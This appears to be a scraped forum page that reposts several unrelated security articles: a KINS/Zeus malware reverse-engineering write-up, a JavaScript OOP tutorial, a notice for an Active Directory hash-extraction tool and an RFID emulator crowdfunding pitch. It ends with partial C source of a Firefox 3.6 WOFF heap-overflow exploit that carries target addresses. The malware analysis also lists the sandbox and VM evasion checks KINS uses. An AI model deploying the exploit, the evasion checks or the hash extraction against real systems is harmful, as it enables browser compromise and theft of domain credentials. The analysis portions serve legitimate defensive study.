4231F1 xor di, dx ; xor with iterator index
4231F4 mov ebx, 0FFh
4231F9 and di, bx ; the result is a unicode string
4231FC inc edx ; increase iterator index
4231FD mov [esi+ecx*2], di ; decrypt byte by byte
423201 cmp dx, [eax+2]
423205 jb short DecryptStringIterator
423207 pop edi
423208 pop ebx
423209 loc_423209:
423209 movzx eax, [eax+_STRINGINFO.size]
42320D xor ecx, ecx
42320F mov [esi+eax*2], cx ; put NULL at the end of the string
423213 retn
423213 DecryptStringW endp

A double XOR operation is applied to every byte of the encrypted string. KINS uses the same structure (_STRINGINFO) and the same decryption routine (DecryptStringW) as Zeus_leaked_source_code. It's a perfect copy&paste approach. There are a lot of strings declared inside the exe, so a comparison of the decrypted strings is necessary.
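Outside of IDA, the double-XOR scheme above is easy to reproduce. Here is a minimal Python sketch; the key and sample string are invented for illustration, and the real routine also widens the output to UTF-16, which is skipped here:

```python
# Re-implementation of the DecryptStringW loop: every byte of the
# encoded string is XORed with the 1-byte key and with its own index.

def decrypt_string(key: int, encoded: bytes) -> str:
    return "".join(chr((b ^ key ^ i) & 0xFF) for i, b in enumerate(encoded))

def encrypt_string(key: int, plain: str) -> bytes:
    # XOR is its own inverse, so the same operation also encrypts.
    return bytes((ord(c) ^ key ^ i) & 0xFF for i, c in enumerate(plain))

if __name__ == "__main__":
    blob = encrypt_string(0x5A, "kernel32.dll")
    print(decrypt_string(0x5A, blob))  # kernel32.dll
```

Because the second XOR uses the byte's own index, two occurrences of the same plaintext character encrypt to different bytes, which is enough to defeat naive string dumps.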
To decrypt all the strings inside KINS you can use this simple IDC script:

static ListStrings(address){
  auto iString;
  auto sInfo;
  auto xorKey;
  auto sLen;
  auto crypted;
  auto i;

  Message("\nDecrypted string list:\n");
  iString = 0;
  while((address + iString) < 0x4026C8)
  {
    sInfo = address + iString;
    xorKey = Byte(sInfo);
    if (xorKey != 0)
    {
      sLen = Word(sInfo+2);
      crypted = Dword(sInfo+4);
      if (!((crypted < MinEA()) || (crypted > MaxEA())))
      {
        Message("\"");
        for(i=0;i<sLen;i++)
          Message("%c", Byte(crypted+i) ^ xorKey ^ i);
        Message("\"\n");
        iString = iString + 7; // sizeof(_STRINGINFO) - 1
      }
    }
    iString++;
  }
}

The resulting list contains a lot of interesting strings, but comparing it with the original list provided by Zeus you'll notice many identical entries. I have to admit there are some new ones, but the core remains the same.

Init

KINS initialization resides in a snippet of code starting @407A25 and ending @407C73. It performs all the tasks needed for a clean execution. Looking at the code you'll notice that the Init procedure is referenced from two different places: one at the beginning of the malware, the other during its execution. Besides, Init contains a lot of calls, but not all of them are executed the first time. That's because KINS has two levels of initialization: it has to set some things now and some later. The first level is performed at the very beginning of the code, and the second level is executed when a particular operation has to be performed. I'll tell you more about this second level in the next blog post. E.g.: the process injection feature requires the execution of parts of the Init procedure that are not scheduled in the first run of Init. I think KINS doesn't want to spoil a lot in the first part of its code, and prefers to follow an exact timing scheme. I said KINS, but I should say Zeus, because this particular code structure is the same one used by Zeus.
Moreover, there's another piece of code taken by copy&paste: to decide what to set up the first time and what later, Init checks the dword value passed as a parameter; I call it "flags". flags is checked inside some if statements; here is a practical example:

.text:00407A31 mov eax, [ebp+flags] // INITF_NORMAL_START the first time, (INITF_INJECT_START | INITF_HOOKS_FOR_USER) the next one
...
.text:00407A36 mov esi, eax
.text:00407A38 and esi, 1 // Check for INITF_INJECT_START flag bit
.text:00407A3B mov [esp+420h+flags_Core], esi
.text:00407A3F jnz short loc_407A4B
.text:00407A41 xor ebx, ebx // First time
.text:00407A43 mov processFlags, ebx
.text:00407A49 jmp short loc_407A4D
.text:00407A4B xor ebx, ebx // Second time
.text:00407A4D call InitLoadModules

flags represents the value passed to Init: the first time its value is 0 (INITF_NORMAL_START) and the second time it is 3 (INITF_INJECT_START | INITF_HOOKS_FOR_USER). I have only just started the analysis, but the copy&paste method has already turned up many times. To put it plainly: KINS is heavily based on Zeus_leaked_source_code. Some parts are truly identical, some have minor changes only, some have interesting additions, and some come from Zeus versions above 2.0.8.9. Yes, the KINS writers took material from more than one Zeus version.

Copy&paste

As far as I've seen, the core of the malware is equal to Zeus's core. It's based on the same structures, variables and code design. Here is a list of things taken directly from Zeus.

- Global variables

Global variables are one of the first things I tried to understand, and I have to say that most of them are simple flags used to mark a particular status or event.
You can recognize them in the code by looking at mov instructions:

407C34 mov ref_count, ebx
407C3A mov reportFile, ax
407C40 mov registryKey, ax
407C46 mov readWriteMutex_localconfig, ax
407C4C mov registryKey_localconfig, ax
407C52 mov readWriteMutex_localsetting, ax
407C58 mov registryKey_localsetting, ax

- Memory initialization

The malware will need dynamically allocated memory; you can find the memory initialization code starting from @407A5D. This time you can see a mix of flag/variable init:

407A5D push ebx
407A5E push 80000h
407A63 push ebx
407A64 call ds:HeapCreate
407A6A mov mainHeap, eax
407A6F cmp eax, ebx
407A71 jnz short HeapCreate_OK
407A73 call ds:GetProcessHeap
407A79 mov hHeap, eax
407A7E mov heapCreated, bl ; heapCreated = false;
407A84 jmp short loc_407A8D
407A86 HeapCreate_OK:
407A86 mov heapCreated, 1 ; heapCreated = true;

mainHeap is a global variable and heapCreated is just a flag recording whether the heap creation succeeded.

- Crypt initialization

Crypto is used by KINS, and like all the other functionalities it gets a small place inside Init:

407A9A mov _last_rand_tickcount, ebx ; _last_rand_tickcount = 0;
407AA0 mov crc32Intialized, bl ; crc32Intalized = false;

From these two lines alone it's hard to guess their meaning, but again a flag and a variable are used. If you want to learn more about them you can use IDA's xref option. After some more investigation you can work out their real use: _last_rand_tickcount is used in a comparison between a value obtained from GetTickCount and the previous tick count value. crc32Initialized is true if crc32 has been initialized, false otherwise.

- Winsock initialization

Another expected feature of a malicious program is the ability to communicate with a server. The malware has to send something to the server, and to start this communication process it needs a call to a function like WSAStartup.
The winsock part is all inside a single call instruction to WSAStartup. KINS and Zeus initiate client-server communication in the same classical way.

- initHandles, initUserData, initPaths

The names of these three procedures are taken from Zeus_leaked_source_code, and I put them together because they initialize global variables only. The procedures are not that interesting per se. To sum up: KINS creates a manual-reset event, gets the security information of a logon access (saving two values: the length of the logon security identifier (SID) and an Id calculated as crc32(SID)), and gets the full path of the KINS executable.

- initOsBasic

The last fully copy&pasted code contains OS-based tasks. It starts by determining whether KINS is running under WOW64 or not. The status is saved in a boolean flag, and after that it tries to add a new full-access security descriptor. Once again it saves the result of the operation; this time it's not a flag variable but a structure with information about the security descriptor. An empty structure means an error during the task. If everything goes fine, KINS produces a 16-byte identifier based on the volume GUID path:

41D9C0 push 64h ; cchBufferLength
41D9C2 lea eax, [ebp+74h+szVolumeName]
41D9C5 push eax ; lpszVolumeName
41D9C6 lea eax, [ebp+74h+szVolumeMountPoint]
41D9CC push eax ; lpszVolumeMountPoint
41D9CD call edi ; GetVolumeNameForVolumeMountPointW
41D9CF test eax, eax ; check the result
41D9D1 jz short GetVolumeNameForVolumeMountPointW_FAILS
41D9D3 cmp [ebp+74h+sz], '{' ; a minor check over the obtained string
41D9D8 jnz short ERROR
41D9DA push [ebp+74h+pclsid] ; pclsid
41D9DD xor eax, eax
41D9DF mov [ebp+74h+var_68], ax ; str[38] = 0;
41D9E3 lea eax, [ebp+74h+sz]
41D9E6 push eax ; lpsz
41D9E7 call ds:CLSIDFromString ; obtains:

GetVolumeNameForVolumeMountPoint can fail, so the snippet above may be executed more than once.
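The CLSIDFromString call above is what turns the volume GUID string into the 16 raw bytes of the identifier. A hedged Python approximation of that step (the volume name below is a made-up example, not taken from the sample; uuid's bytes_le mirrors the little-endian CLSID layout):

```python
# Sketch of the volume-GUID-to-identifier step: extract the {GUID}
# substring and convert it to 16 raw bytes, as CLSIDFromString would.
import uuid

def volume_guid_to_id(volume_name: str) -> bytes:
    guid = volume_name[volume_name.index("{"):volume_name.index("}") + 1]
    return uuid.UUID(guid).bytes_le  # 16 bytes, CLSID byte order

if __name__ == "__main__":
    vol = "\\\\?\\Volume{12345678-1234-1234-1234-123456789abc}\\"
    print(volume_guid_to_id(vol).hex())
```

On Windows the input string would come from GetVolumeNameForVolumeMountPointW, which is why the disassembly first checks that the buffer starts with '{' after the prefix.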
The first lpszVolumeMountPoint value is obtained by calling SHGetFolderPath. In case GetVolumeNameForVolumeMountPoint fails, the new lpszVolumeMountPoint string is obtained by cutting off its last part (using PathRemoveFileSpec). E.g.: it tries "C:\WINDOWS\" first and then "C:\" only. From the organization of the code and the large variety of flags/variables used, it seems there's a big focus on details. If something goes wrong, or if KINS thinks it doesn't have the right conditions to run, it stops running. E.g.: KINS uses a variable to store a value obtained from the combination of the OS version and the integrity level; if the value falls outside a range of specific acceptable values, the malware stops. That's why Zeus was, from some points of view, a masterpiece. Yes, I said Zeus, and you know why.

Copy&paste with minor changes

This happens when the code structure of a procedure is the same as in the original version but there are some changes or additions. It's the case of the InitLoadModules function: basically it's a sequence of DecryptString/GetProcAddress calls. The list of function addresses to retrieve is slightly changed from Zeus. The new list is composed of: NtCreateThread, NtCreateUserProcess, NtQueryInformationProcess, NtQueryInformationThread, RtlUserThreadStart, NtMapViewOfSection, NtUnmapViewOfSection, NtSuspendProcess, NtResumeProcess, NtClose and LdrFindEntryForAddress. I don't know if it's a KINS addition or if it's taken from a newer Zeus version. I'm not a security expert and I can't access all the possible Zeus versions, but it's a doubt I have: KINS takes some concepts from Zeus versions beyond the one I'm referring to (2.0.8.9).

Copy&paste from a more recent Zeus version

Here's a practical example of my doubt: the anti-analysis check routine! As I said before, KINS runs only under particular conditions, and its continued execution depends on the values returned by the 8 checks called here.
Every call performs a specific check:

- CheckForPopupKiller: looks for the file "C:\popupkiller.exe"; if it exists, KINS aborts
- CheckForExecuteExe: another unwanted file on the system is "C:\TOOLS\execute.exe"
- CheckForSbieDll: time for a dll check; it tries to load "SbieDll.dll" (a Sandboxie-related dll) and doesn't want that dll on the system
- CheckMutexFrz_State: the mutex under observation is Frz_State, which comes from the Deep Freeze software
- CheckForNPF_NdisWanIp: the network tool check; KINS doesn't want "\\.\NPF_NdisWanIp" on the system
- CheckForVMWareRelatedFiles: VMware is strictly prohibited; "\\.\HGFS" and "\\.\vmci" are the files to look for
- CheckForVBoxGuest: even VirtualBox is prohibited ("\\.\VBoxGuest")
- CheckForSoftwareWINERegKey: checks the existence of the registry key "Software\WINE"

If one of the calls above fails, KINS aborts its execution immediately. There's no trace of this code inside Zeus_leaked_source_code, but I read some articles on the net talking about this specific snippet. You can read something here.

Snippets based on Zeus with KINS-specific features

That's the most interesting part of the malware's Init, the place where something new joins the party! In this part of the code the malware tries to create some Id values based on the machine's components and properties (computer name, version information, install date, GUID, physical memory and volume serial number). Zeus does the same, but it uses a simple XOR decryption, crc32 and RC4 in its calculations. KINS replaces all of this with its own virtual machine combined with crc32, RC4, the SHA-1 hash algorithm and some brain-blasting calculations. I won't go into details right here, but if you need them drop me a mail and I'll tell you more. Basically, the additions are strictly related to the use of the virtual machine. I gave a description of the virtual machine here, but I didn't talk about its usage inside the malware.
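The file-existence half of the anti-analysis checks listed earlier boils down to probing for a handful of artifact paths. A platform-neutral sketch (the function name is mine, not KINS'; the Windows-specific mutex, LoadLibrary and device-path probes are omitted):

```python
# Sketch of the sandbox/VM artifact checks: if any listed path exists,
# a caller imitating KINS would abort execution.
import os

ANALYSIS_ARTIFACTS = [
    r"C:\popupkiller.exe",
    r"C:\TOOLS\execute.exe",
    # "\\.\NPF_NdisWanIp", "\\.\HGFS", "\\.\vmci" and "\\.\VBoxGuest"
    # are device paths opened with CreateFile on Windows, listed here
    # only for completeness.
]

def analysis_environment_detected(paths=ANALYSIS_ARTIFACTS) -> bool:
    return any(os.path.exists(p) for p in paths)
```

A real implementation would additionally open the Frz_State mutex and attempt LoadLibrary("SbieDll.dll"); on a machine with none of the artifacts the function returns False and execution continues.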
The VM is called several times during the lifetime of the malware, but every time it modifies DataBuffer in the same way (meaning the algorithm produced by the VM is always the same). When the VM ends, a number of bytes from DataBuffer are taken for a specific usage; in this initialization process they are used as the key for the RC4 algorithm. Imho, it's quite a strange approach. I don't know why you would call the same algorithm so many times, especially when the result is always the same. Maybe it's just a way to complicate the job of the reversers out there, or maybe I'm missing something… Is KINS a new myth, or was it simply born from the leaked Zeus source code? Well, I'm not a security expert and I can't say for sure, but judging from what I've seen so far I think KINS is strongly based on Zeus_leaked_source_code: they have the same DNA! It's the same concept as in real life: KINS has something completely new, but the core comes from the father, Zeus. Anyway, this is only an introduction to the DNA paternity test. Now I would like to know if we can apply the same concept to all the features of both malware families. Maybe soon; now it's holiday time! Sursa: KINS malware: initialization and DNA paternity test | My infected computer
  8. JavaScript Object Oriented Programming (OOP) Tutorial Object Oriented Programming is one of the most popular ways to program. Before OOP there were only lists of instructions executed one by one, but in OOP we deal with objects and how those objects interact with one another. JavaScript supports Object Oriented Programming, but not in the same way as other OOP languages (C++, PHP, Java, etc.). The main difference between those languages and JavaScript is that there are no classes in JavaScript, even though classes are very important for creating objects. But there is a way we can simulate the class concept in JavaScript. Another important difference is data hiding: there are no access specifiers (public, private, protected) in JavaScript. Again, we will simulate the concept using variable scope in functions.

Object Oriented Programming Concepts

1) Object
2) Class
3) Constructor
4) Inheritance
5) Encapsulation
6) Abstraction
7) Polymorphism

Preparing the work space

Create a new file "oops.html" and write this code in it. We will write all our JavaScript code in this file.

<html>
<head>
<title>JavaScript Object Oriented Programming(OOPs) Tutorial</title>
</head>
<body>
<script type="text/javascript">
//Write your code here.....
</script>
</body>
</html>

1) Object

Any real-world entity can be considered an object. Every object has some properties and functions. For example, consider a person as an object: he has properties like name and age, and functions like walk, talk, eat and think. Now let's see how we create objects in JavaScript. There are many ways to create objects in JavaScript. Some of them are:

//1)Creating Object through literal
var obj={};

//2)Creating with Object.create
var obj= Object.create(null);

//3)Creating using new keyword
function Person(){}
var obj=new Person();

We can use any of the above ways to create an object.

2) Class

As I said earlier, there are no classes in JavaScript, because JavaScript is a prototype-based language.
But we can simulate the class concept using JavaScript functions.

function Person(){
  //Properties
  this.name="aravind";
  this.age="23";
  //functions
  this.sayHi=function(){
    return this.name +" Says Hi";
  }
}
//Creating person instance
var p=new Person();
alert(p.sayHi());

3) Constructor

Actually, the constructor is a concept that belongs to the class concept. The constructor is used to assign values to the properties of the class when creating an object with the new operator. In the code above we used name and age properties for the Person class; now we will assign values while creating new Person objects, as below.

function Person(name,age){
  //Assigning values through constructor
  this.name=name;
  this.age=age;
  //functions
  this.sayHi=function(){
    return this.name +" Says Hi";
  }
}
//Creating person instance
var p=new Person("aravind",23);
alert(p.sayHi());
//Creating second person instance
var p=new Person("jon",23);
alert(p.sayHi());

4) Inheritance

Inheritance means one class acquiring the properties and functions of another class. For example, let's consider a Student class. A student also has name and age properties. We already have these properties in the Person class, so it's much better to inherit them from Person instead of re-creating them. Now let's see how we can do inheritance in JavaScript.

function Student(){}

//1)Prototype based inheritance
Student.prototype= new Person();

//2)Inheritance through Object.create (alternative; note that sayHi is
//defined in the constructor, so this variant alone would not expose it)
//Student.prototype=Object.create(Person.prototype);

var stobj=new Student();
alert(stobj.sayHi());

We can do inheritance in either of the two ways above.

5) Encapsulation

Before we learn encapsulation and abstraction we first need to know what data hiding is and how we can achieve it in JavaScript. Data hiding means preventing data from being accessed outside its scope. For example, the Person class has a Date of Birth (dob) property that we want to hide from the outside. Let's see how we can do it.
function Person(){
  //this is a private variable
  var dob="8 June 2012";

  //public properties and functions
  return{
    age:"23",
    name:"aravind",
    getDob:function(){
      return dob;
    }
  }
}

var pobj=new Person();

//this will get undefined
//because dob is private to Person
console.log(pobj.dob);

//will get the dob value; we use a public
//function to get the private data
console.log(pobj.getDob());

Encapsulation means wrapping up public and private data into a single unit. The example above is a good illustration of encapsulation.

6) Abstraction

Abstraction means hiding the inner implementation details and showing only the outer details. To understand abstraction we would need the abstract and interface concepts from Java, but there is no direct equivalent of abstract classes or interfaces in JS. OK! In order to understand abstraction in JavaScript, let's take an example from the jQuery library. In jQuery we use $("#ele") to select an element with id ele on a web page. Actually this code calls the native JavaScript code document.getElementById("ele"); but we don't need to know that: we can happily use $("#ele") without knowing the inner details of the implementation.

7) Polymorphism

The word polymorphism in OOP means having more than one form. In JavaScript an object, property or method can have more than one form. Polymorphism is a very cool feature for dynamic binding, or late binding.

function Person(){
  this.sayHI=function(){}
};

//This will create the Student class
function Student(){};
Student.prototype=new Person();
Student.prototype.sayHI=function(){
  return "Hi! I am a Student";
}

//This will create the Teacher class
function Teacher(){};
Teacher.prototype=new Person();
Teacher.prototype.sayHI=function(){
  return "Hi! I am a Teacher";
}

var sObj=new Student();

//This will check if the student
//object is an instance of Person or not;
//if not, it won't execute our alert code.
if (sObj instanceof Person) {
  alert("Hurry!
JavaScript supports OOps"); } Conclusion JavaScript supports Object Oriented Programming(OOP)Concepts. But it may not be the direct way. We need to create some simulation for some concepts. 10 Aug 2013 by aravind buddha at 10:44 PM Sursa:JavaScript Object Oriented Programming(OOP) Tutorial : Techumber
  9. [h=1]Active Directory Password Hash Extraction[/h] Just added a tool for offline Active Directory password hash extraction. It has very basic functionality right now, but much more is planned. It's a command-line application that currently runs on Windows only.

ntds_decode -s <FILE> -d <FILE> -m -i

 -s <FILE> : SYSTEM registry hive
 -d <FILE> : Active Directory database
 -m : Machines (omitted by default)
 -i : Inactive, Locked or Disabled accounts (omitted by default)

The SYSTEM registry hive and Active Directory database are from a domain controller. These files are obviously locked, so you need to back them up using the Volume Shadow Copy Service. The output format is similar to pwdump. LM and NTLM hashes are extracted from active user accounts only. ntds_decode mounts the SYSTEM file, so Administrator access is required on the computer you run it on. If you're an experienced pen tester or administrator who would like to test this tool, you can grab it from here. It's advisable you don't use the tool unless you know what you're doing. Source isn't provided at the moment because it's too early to release. If you have questions about it, feel free to e-mail the address provided in README.txt. Sursa: Active Directory Password Hash Extraction | Insecurety Research
  10. RFIDler - A Software Defined RFID Reader/Writer/Emulator RFIDler (RFID Low-frequency Emulator & Reader). An open platform RFID reader/writer/emulator that can operate in the 125-134 kHz range. Software Defined is the buzz-word in RF these days, and we use SDR (Software Defined Radio) in our work as reverse-engineers all the time, with great projects like HackRF and GNU Radio, etc. So when it came to looking at RFID for a recent engagement, we decided to see if we couldn't apply the same thinking to that technology. And guess what? Yes, you can! One of our team, Adam Laurie (aka Code Monkey), has spent many years playing with RFID, and is the author of RFIDIOt, the open-source RFID python software library, so is very familiar with the higher-level challenges associated with these devices. However, a complete understanding of what goes on 'under the hood' is harder to come by, and it was only when he teamed up with Chip Monkey, Zac Franken, who has been hardware hacking and pulling things to bits (and putting them back together so they do something much more fun) since he was big enough to hold a screwdriver, that the full picture started to emerge... The Goal To produce a tool for Low Frequency (125-134 kHz) RFID research projects, as well as a cut-down (Lite) version that can be embedded into your own hardware projects. The fully featured version we hope to bring in for around £30.00, and the Lite version for under £20.00. Features We have written extensive firmware which includes a user interface and an API to allow easy use of the system and to allow you to explore, read and emulate a wide range of low frequency RFID tags.
- Utilise ANY modulation scheme, including bi-directional protocols
- Write data to tag
- Read data from tag
- Emulate tag
- Sniff conversations between external reader & tag
- Provide raw as well as decoded data
- Built-in antenna
- External antenna connection
- USB power and user interface
- TTL interface
- GPIO interface
- JTAG interface for programming
- USB Bootloader for easy firmware updating
- External CLOCK interface if not using processor
- External power connector if not using USB

The hardware gives you the capability to read/write/emulate more or less any LF tag, but we've also taken the hard work out of most of them by implementing all the tag types we can find in the public domain. These include:

- EM4102 / Unique
- Hitag 1/2/S
- FDX-B (ISO 11784/5 Animal Standard)
- Q5
- T55xx
- Indala
- Noralsy
- HID Prox
- NXP PCF7931
- Texas Instruments
- VeriChip
- FlexPass

Firmware

We have working firmware that proves the concept, and we will continue to develop the code to provide both command line interface and API for end-user applications. This will be posted in a github repository, here: https://github.com/ApertureLabsLtd/RFIDler

Hardware

The three devices we will produce are:

- RFIDler-LF-Nekkid - The bare naked circuit board with built-in antenna, ready for you to populate the electronic components yourself.
- RFIDler-LF-Lite - This is the board with only the low-level RFID communication components, to allow you to incorporate it into your own projects (e.g. controlling it with Arduino, Raspberry Pi, BeagleBone etc.), providing GPIO, power and clock interfaces only. Firmware can be ported from (and/or contributed to) the RFIDler repository, or write your own from scratch.
- RFIDler-LF-Standard - This is the fully populated Low Frequency (125/134 kHz) board with on-board processor that can be used as a stand-alone device for research and in-the-field testing etc., providing TTL and USB serial command line and API interfaces as well as raw GPIO, clock and power.
Your pledges will help us get this from working prototype to final production run, incorporate where possible any cool ideas/features that we hadn't thought of, and bring Software Defined RFID to the masses! The challenges we have left to complete are:

- Processor selection - we've used the Pic32 as a proof-of-concept chip, but there may be others better suited to this kind of application. We will research and test 2 or 3 other chips before making a final decision.
- Coil design - coils are almost as mysterious as RFID itself, so we need to try various designs to see which on-board and external coils give us the best performance across the target frequency ranges.
- Final Board Layout - Lay out the final boards and send them to manufacturing.

Further Details

Here is Adam's blog entry on the subject: Obviously a Major Malfunction...: RFIDler - An open source Software Defined RFID Reader/Writer/Emulator

And here is the prototype:

And here we are reading an Indala PSK tag:

The logic analyser trace shows that RFIDler is pulsing on the PSK Reader line whenever there is a phase change on the analogue line (the small green pulses are negative, and the large ones positive). All our software has to do is detect those pulses at each bit period, and clock out the data. The 'Bitstream' line shows the software bit value detection in action, as it's being driven by the UBW32 board. The other nice thing we can do in software is monitor the quality of the read: the width of the reader pulse narrows as the coil goes in and out of the field and the coils 'de-couple', so we can flag a read error when the pulse gets too narrow. This is important when you're looking at unknown tag types: the manufacturer may have built-in parity or other data checks so their native reader knows when it's getting a good read, but we don't have knowledge of the relevant algorithms, so we cannot do the same. With this technique, we can easily filter out bad reads that would give us corrupt data.
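The "detect pulses at each bit period and clock out the data" idea, together with the narrow-pulse quality check, can be sketched in a few lines. All numbers here are invented for illustration; the real RFIDler firmware is written in C and works on hardware timer captures:

```python
# Toy PSK clock-out: one pulse-width sample per bit period. A pulse
# marks a phase change (toggle the current bit); a too-narrow pulse
# means the coils de-coupled mid-read, so the whole read is rejected.

MIN_PULSE_WIDTH = 4  # arbitrary quality threshold for this sketch

def clock_out_bits(pulse_widths, start_bit=0):
    bit, bits = start_bit, []
    for width in pulse_widths:
        if 0 < width < MIN_PULSE_WIDTH:
            return None          # bad read: pulse too narrow
        if width:                # phase change at this bit period
            bit ^= 1
        bits.append(bit)
    return bits

if __name__ == "__main__":
    print(clock_out_bits([0, 8, 0, 8]))  # [0, 1, 1, 0]
    print(clock_out_bits([0, 2, 0, 8]))  # None (rejected)
```

Rejecting a whole read on one weak pulse is exactly the conservative behaviour the paragraph above argues for when tag-side checksums are unknown.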
Of course, as well as reading a tag, we want to be the tag, so here we are emulating PSK: and we could do that for any bitrate, modulation scheme or data pattern (within reason), as well as have 2-way conversations (e.g. Hitag2). So that brings us to where we are now...

Timeframe

We've allowed the following timeframes for each stage:

- Project starts in October (assuming we get funded!)
- Full circuit design and CPU selection: 4 weeks, taking us to November.
- Beta test phase: 6 weeks up to mid-December, then it's the Christmas & New Year break...
- Final production run: 4 weeks starting in January, so we should be done by February.

We all know that in real life timescales slip, but since the underlying hardware is already proven in our prototype, and all we're really doing now is fine-tuning and incorporating feedback from the beta test, we expect this to be a fairly quick project!

Risks and challenges

We have great facilities in-house for prototyping electronic circuits, and so we expect the main challenges to have been worked out before we go to the trouble and expense of outside manufacturing. However, we also have a great relationship with our fab company, who we have used for several years on many successful projects, so we know they have the resources to get the job done. We look forward to working with you!

Sursa: RFIDler - A Software Defined RFID Reader/Writer/Emulator by Aperture Labs Ltd. — Kickstarter
  11. [h=1]Mozilla Firefox 3.6 - Integer Overflow Exploit[/h]

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <zlib.h>

/*
  x90c WOFF 1day exploit
  (MFSA2010-08 WOFF Heap Corruption due to Integer Overflow 1day exploit)

  CVE-ID: CVE-2010-1028
  Full Exploit: http://www.exploit-db.com/sploits/27698.tgz

  Affected Products:
   - Mozilla Firefox 3.6 ( Gecko 1.9.2 )
   - Mozilla Firefox 3.6 Beta1, 3, 4, 5 ( Beta2 ko not released )
   - Mozilla Firefox 3.6 RC1, RC2

  Fixed in:
   - Mozilla Firefox 3.6.2 ( after 3.6 version this bug fixed )

  security bug credit: Evgeny Legerov < intevydis.com >

  Timeline:
  2010.02.01 - Evgeny Legerov initially discovered it and shipped it in
               "Immunity 3rd Party Product VulnDisco 9.0"
               https://forum.immunityinc.com/board/thread/1161/vulndisco-9-0/
  2010.02.18 - without a reporter, independently analyzed; contacted mozilla
               and secunia before advisory reporting
               http://secunia.com/advisories/38608
  2010.03.19 - CVE registered
               http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1028
  2010.03.22 - Mozilla advisory report
               http://www.mozilla.org/security/announce/2010/mfsa2010-08.html
  2010.04.01 - x90c exploit (x90c.org)

  Compile:
  [root@centos5 woff]# gcc CVE-2010-1028_exploit.c -o CVE-2010-1028_exploit -lz

  rebel: greets to my old l33t hacker dude in sweden ...
  BSDaemon: and Invitation of l33t dude for exploit share
  #phrack@efnet, #social@overthewire

  x90c
*/

typedef unsigned int UInt32;
typedef unsigned short UInt16;

/* for the above two types, some WOFF header struct fields use big-endian byte order.
*/

typedef struct {
    UInt32 signature;
    UInt32 flavor;
    UInt32 length;
    UInt16 numTables;
    UInt16 reserved;
    UInt32 totalSfntSize;
    UInt16 majorVersion;
    UInt16 minorVersion;
    UInt32 metaOffset;
    UInt32 metaLength;
    UInt32 metaOrigLength;
    UInt32 privOffset;
    UInt32 privLength;
} WOFF_HEADER;

typedef struct {
    UInt32 tag;
    UInt32 offset;
    UInt32 compLength;
    UInt32 origLength;
    UInt32 origChecksum;
} WOFF_DIRECTORY;

#define FLAVOR_TRUETYPE_FONT 0x0001000
#define FLAVOR_CFF_FONT 0x4F54544F

struct ff_version {
    int num;
    char *v_nm;
    unsigned long addr;
};

struct ff_version plat[] = {
    { 0, "Win XP SP3 ko - FF 3.6", 0x004E18ED },
    { 1, "Win XP SP3 ko - FF 3.6 Beta1", 0x004E17BD },
    { 2, "Win XP SP3 ko - FF 3.6 Beta3", 0x004E193D },
    { 3, "Win XP SP3 ko - FF 3.6 Beta4", 0x004E20FD },
    { 4, "Win XP SP3 ko - FF 3.6 Beta5", 0x600A225D },
    { 5, "Win XP SP3 ko - FF 3.6 RC1", 0x004E17BD },
    { 6, "Win XP SP3 ko - FF 3.6 RC2", 0x004E18ED },
    { 0x00, NULL, 0x0 }
};

void usage(char *f_nm)
{
    int i = 0;

    fprintf(stdout, "\n Usage: %s [Target ID]\n\n", f_nm);
    for(i = 0; plat[i].v_nm != NULL; i++)
        fprintf(stdout, "\t{%d} %s.
\n", plat[i].num, plat[i].v_nm);

    exit(-1);
}

int main(int argc, char *argv[])
{
    WOFF_HEADER woff_header;
    WOFF_DIRECTORY woff_dir[1];
    FILE *fp;
    char dataBlock[1024];
    char compressed_dataBlock[1024];
    char de_buf[1024];
    int total_bytes = 0, total_dataBlock = 0;
    unsigned long destLen = 1024;
    unsigned long de_Len = 1024;
    unsigned long i = 0;
    unsigned long addr_saved_ret_val = 0;
    int ret = 0;
    int n = 0;

    if(argc < 2)
        usage(argv[0]);

    n = atoi(argv[1]);
    if(n < 0 || n > 6) {
        fprintf(stderr, "\nTarget number range is 0-6!\n");
        usage(argv[0]);
    }

    printf("\n#### x90c WOFF exploit ####\n");
    printf("\nTarget: %d - %s\n\n", (plat[n].num), (plat[n].v_nm));

    // WOFF HEADER
    woff_header.signature = 0x46464F77;        // 'wOFF' ( L.E )
    woff_header.flavor = FLAVOR_TRUETYPE_FONT; // sfnt version ( B.E )
    woff_header.length = 0x00000000;           // woff file total length ( B.E )
    woff_header.numTables = 0x0100;            // 0x1 - woff dir entry length ( B.E )
    woff_header.reserved = 0x0000;             // res bit ( all zero )

    // totalSfntSize value will bypass validation condition after integer overflow
    woff_header.totalSfntSize = 0x1C000000;    // 0x0000001C ( B.E )
    woff_header.majorVersion = 0x0000;         // major version
    woff_header.minorVersion = 0x0000;         // minor version
    woff_header.metaOffset = 0x00000000;       // meta data block offset ( not used )
    woff_header.metaLength = 0x00000000;       // meta data block length ( not used )
    woff_header.metaOrigLength = 0x00000000;   // meta data block before-compressed length ( not used )
    woff_header.privOffset = 0x00000000;       // Private data block offset ( not used )
    woff_header.privLength = 0x00000000;       // Private data block length

    woff_dir[0].tag = 0x54444245;        // 'EBDT' ( B.E )
    woff_dir[0].offset = 0x40000000;     // 0x00000040 ( B.E )
    woff_dir[0].compLength = 0x00000000; // ( B.E )

    // to trigger field bit.
    // 0xFFFFFFF8-0xFFFFFFFF value to trigger integer overflow.
